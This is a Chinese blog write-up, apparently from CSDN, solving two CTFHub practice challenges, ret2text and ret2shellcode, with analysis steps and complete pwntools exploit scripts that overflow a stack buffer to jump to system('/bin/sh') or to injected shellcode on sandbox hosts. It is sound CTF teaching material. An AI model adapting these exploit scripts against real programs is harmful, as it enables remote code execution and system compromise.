CTFHub[PWN技能树]——栈溢出

最新推荐文章于 2024-04-24 22:56:49 发布
最新推荐文章于 2024-04-24 22:56:49 发布
阅读量2.2k 收藏 16
点赞数 4
分类专栏: CTFHub PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/111411717
版权
PWN 同时被 2 个专栏收录
125 篇文章 18 订阅
订阅专栏
CTFHub
2 篇文章 1 订阅
订阅专栏

文章目录

一、ret2text

  1. 例行检查,64位程序,没有开启任何保护
    在这里插入图片描述
  2. 本地运行一下情况,看看大概的情况
    在这里插入图片描述
  3. 64位ida载入,检索程序里的字符串发现了bin/sh
    在这里插入图片描述
    要满足条件才可以执行,但是我们可以直接跳转到0x4007B8去system(‘/bin/sh’)
    在这里插入图片描述
  4. 看main函数
    在这里插入图片描述
    第8行,gets函数读入没有限制数据的长度,明显的溢出,溢出ret到执行system(‘/bin/sh’)的地址即可
from pwn import *

#p=process('./pwn1')
p=remote("challenge-79d4d6a23952a67b.sandbox.ctfhub.com",24293)

payload='a'*(0x70+8)+p64(0x4007b8)

p.sendline(payload)

p.interactive()

在这里插入图片描述

二、ret2shellcode

  1. 例行检查,64位程序,仍然未开启任何保护
    在这里插入图片描述
  2. 本地运行一下,看看大概的情况,可以看到,给了我们一个栈上的地址
    在这里插入图片描述
  3. 64位ida载入,看main函数
    在这里插入图片描述
    一开始给了我们参数buf在栈上的地址,然后读入buf,12行,buf只有0x10,但是读入了0x400,明显的溢出漏洞
  4. 这题没有给我们提供现成的后门,加上没有nx保护,可以直接执行shellcode来获取shell
    设置一下环境参数,之后直接用pwntools生成shellcode
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
  1. 有了shellcode,然后就是shellcode写到哪里的问题
    本地运行的时候加上上图的代码,可以知道一开始输出了buf参数的地址,接收一下就获得了栈上的地址
buf_addr = p.recvuntil("]")
buf_addr = int(buf_addr[-15:-1], 16)

我们将shellcode写入ret,这样程序在返回的时候就直接去执行我们的shellcode了
所以我们的shellcode的地址是,0x10是buf的大小,第一个0x8是ebp,第二个是ret

shellcode_addr = buf_addr + 0x10+0x8+0x8
  1. shellcode有了,shellcode的地址也有了,现在只要往这个地址传入shellcode即可完成利用
payload = 'a' * 24 + p64(shellcode_addr) + shellcode

完整exp:

#coding=utf-8
from pwn import *
import re

#context.log_level = "debug"
context.arch = 'amd64'

p=remote("challenge-b841961e5e4c03f8.sandbox.ctfhub.com",37282)

#p=process('./pwn2')
#gdb.attach(p)

buf_addr = p.recvuntil("]")

buf_addr = int(buf_addr[-15:-1], 16) 

shellcode_addr = buf_addr + 32  


shellcode = asm(shellcraft.sh())

payload = 'a' * 24 + p64(shellcode_addr) + shellcode
p.recv()
p.sendline(payload)
p.interactive()

在这里插入图片描述

技能树的题目现在就出了这么多,出了新的继续更新,接下来尝试历年真题

Angel~Yan
关注
  • 4
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
CTFhub pwn
清霂的博客
02-04 1196
这里写目录标题1.ret2text2.ret2shellcode 1.ret2text file checksec ida64 gets函数有栈溢出漏洞,题目为ret2text即返回到text段得到shell shift+f12打开字符串窗口,找到/bin/sh 点进去,选中/bin/sh,右键,交叉引用列表(可以找到使用/bin/sh的地方) 看到把/bin/sh放入rdi后,调用了system x64,64位系统中rdi,rsi,rdx,rcx,r8,r9作为调用函数的前6个参数,如果参数多于6
CTFHub 栈溢出 ret2text exp代码
柠檬i的博客
10-09 1936
CTFHub 栈溢出 ret2text exp代码
CTFHUB技能树——Pwn前置技能学习
最新发布
QX_XDE的博客
04-24 618
汇编指令讲解
CTFHUB-WriteUp】pwn技能树-栈溢出-Ret2VDSO
qq_39933891的博客
03-11 808
ops
ctfhubret2shellcode
m0_75234353的博客
04-02 365
要把shellcode写入返回地址之后,所以shellcode地址为16+8+8=32。还要再覆盖上父函数的栈底的指针信息,因为是64架构,所以有8字节。发现stack的权限有rwx,本题的攻破点就在栈上了。由图可得:buf距rbp 0x10,也就是16个字节。连接成功,即可得flag。
ctfhub 技能树pwn 栈溢出 ret2text
m0_75234353的博客
03-29 597
看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8。选中该行,看到下方的地址(4007B8)看到gets危险函数,再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入:wq 保存退出。
Jarvis OJ level1 writeup
PLpa的博客
07-07 645
拿到题目,首先我们检查一下程序的保护: 可以看出来,程序什么保护也没开,既然没开NX保护,说明堆栈上的代码可以执行。 我们打开IDA反汇编一下: 我们看到这里可输入一个buf,并且题目把buf的地址也输出到屏幕上,我们就可以控制buf植入shell code了,再返回调用即可。 ...
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
ctf题库ctf-pwn赛题收集
03-31
此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。在比赛中,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,...
安全技能树(简版).pdf
07-21
安全技能树(简版) security_skill_tree_basic 漏洞测试 渗透测试 防御 从脚本到大并发 高效习惯
栈溢出基础——ROP1.0的例题
07-13
栈溢出基础——ROP1.0的例题 在网络安全领域,栈溢出是一种常见的漏洞类型,它源于程序处理内存时的错误,可能导致攻击者控制程序执行流程,从而执行恶意代码。本篇将深入探讨栈溢出的基础知识,并通过一个名为...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTFhub-pwn-[ret2shellcode]
m0_43405474的博客
08-26 1369
CTFpwn的一个关于ret2shellcode的小练习,来自CTFhub
CTFHUB-PWN-ret2shellcode
m0_64180167的博客
04-16 851
几个大方向的思路:没有PIE:ret2libcNX关闭:ret2shellcode其他思路:ret2csu、ret2text 【程序本身有先检查开了什么保护没有开保护 并且是64 的放入ida64查看字符串发现没有shell我们看看主函数发现有read函数 但是没有shell我们现在要确定一些信息。
CTFHub技能树---pwn-Chunk Extend
KaliLinux_V的博客
02-07 256
add这里如果 index 0 ~ 9 都申请了的 chunk ,那么 i = 10 再退出 for 循环,但是还会接下去利用 ptr[10] = malloc(ptr[20]) 申请chunk,实现 index 0 的堆块溢出。最后第11个chunk的size会变成非常大,编辑chunk0,就可以实现溢出。也就是add 可以覆盖掉一个第一个 chunk 的 size。
CTFhub 技能树 PWN ret2text Python3 exp
break_cat的博客
11-17 1165
题目链接:https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text WP:https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html 搜exp的时候发现已经有人写过WP了,于是就Cirl+CV,发现原程序是用Python2写的,我的pwntools环境是Python3,因此程序需要稍作修改。 from pwn import * h
ret2shellcode
weixin_56301399的博客
07-20 464
基本流程是先查看文件信息,然后ida反编译,再去寻找自己所要的变量,最后构建代码。
pwn+栈溢出解题思路
11-10
栈溢出是一种常见的漏洞,攻击者可以通过利用栈溢出漏洞来执行恶意代码。pwn是一种利用栈溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,通常是通过覆盖返回地址或修改函数指针来实现。 3. 获取shell:利用漏洞执行恶意代码后,需要获取shell来进一步控制系统。可以通过调用system函数来执行shell命令。 4. 获取函数地址:在一些情况下,需要获取函数的地址来执行攻击。可以通过泄露函数地址或者使用动态链接库来获取函数地址。 5. 绕过保护机制:现代操作系统通常会有一些保护机制来防止pwn攻击,例如栈随机化、地址空间布局随机化等。攻击者需要找到绕过这些保护机制的方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值